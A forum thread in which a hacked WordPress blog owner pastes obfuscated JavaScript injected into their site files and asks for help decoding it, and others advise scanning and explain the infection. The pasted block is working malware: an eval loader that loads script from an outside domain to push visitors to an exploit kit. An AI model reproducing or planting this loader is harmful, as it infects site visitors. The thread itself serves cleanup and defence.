My blog got hacked, help with decoding

prozium (Newbie; joined Mar 31, 2009; 48 messages; 12 reaction score)
Hi there, this is my first thread here and I didn't want it to be something like this, but we can't get what we want...
So, to the point: my blog (WordPress 2.5) got hacked; it was my hoster's fault. All my .php/.js/.xml files got edited (well, not all of them, but most of them). The editing of ALL the files (in all folders: admin, plugins, themes and so on...) took 2-3 minutes, so I'm assuming that he used a script of some kind.
This code was inserted in most of the .php/.js/.xml files:

Code:
</head><script language=javascript><!-- 
(function(m9RlI){var HAspt='%';var UoQSJ=unescape(('var:20a:3d:22Scr:69p:74:45n:67ine:22:2cb:3d:22Versi:6fn:28)+:22:2cj:3d:22:22:2cu:3dnav:69ga:74or:2e:75serAg:65:6et:3bif((u:2eind:65xOf(:22W:69n:22):3e0):26:26:28:75:2eindexOf(:22:4eT:206:22):3c0):26:26(doc:75ment:2ecoo:6bie:2eind:65x:4ff:28:22:6d:69e:6b:3d1:22):3c:30):26:26(typ:65of(zr:76zts:29:21:3dtypeof(:22A:22:29):29:7b:7arvzts:3d:22A:22:3be:76al(:22if(win:64o:77:2e:22+a:2b:22)j:3dj+:22+:61+:22Major:22+b+a+:22Min:6fr:22+b:2ba+:22Build:22+b:2b:22j:3b:22):3bdo:63ument:2ewrite(:22:3c:73cri:70t:20s:72c:3d:2f:2fgu:6dblar:2ec:6e:2frs:73:2f:3f:69:64:3d:22+j+:22:3e:3c:5c:2fsc:72ipt:3e:22):3b:7d').replace(m9RlI,HAspt));eval(UoQSJ)})(/:/g);
 --></script>
<body>

It's some kind of redirecting script that redirects to something (adware/spyware/viruses); I'm still not sure what. If there is someone who can help me decode it and understand what it is doing, I will really appreciate any help.

I can provide the PHP that includes this code too, if necessary.
 
Sucks, man... Download the Exploit Scanner plugin and scan your blog. It will show the suspicious pages and provide a few instructions on how to remove the code.

My blog was hacked and this plugin helped me find that malicious code. Also, Google marked the blog as SITE IS HARMFUL, so better do this RIGHT NOW...
 
First thing I did was to take the blog down; it was exposed for only 3 hours. Thanks for the advice, I will scan it with the plugin, but first the hoster must figure out how his server got hacked. I want to decode the JS so I can find out who is doing this and what the spin here is.
 
The JavaScript injection on your pages is an obfuscated iframe. Any user sent to your blog will be silently (and invisibly) redirected to an exploit kit. The kit will try to inject shellcode onto the visitor, thus infecting them.

It could be a banking trojan, a standard bot for a botnet or some other random virus.

You have an un-updated script that was in your shared/hosting public html directory. Unless you remove whatever is outdated and exploitable, it will continue to be infected, via remote file inclusion or a SQL injection.

All of the .php and/or .html files were done in a second via a simple-to-make Perl script. They had shell access to your site, probably a standard c99 or r57; it doesn't matter.

Your AV was firing detections not at the virus it attempted to land on your box, but at the recognizable shellcode.
You don't really have to worry; they're most likely script kiddies, considering it's REALLY easy to UD an exploit kit. Just get rid of the vulnerable script and you'll be fine.
 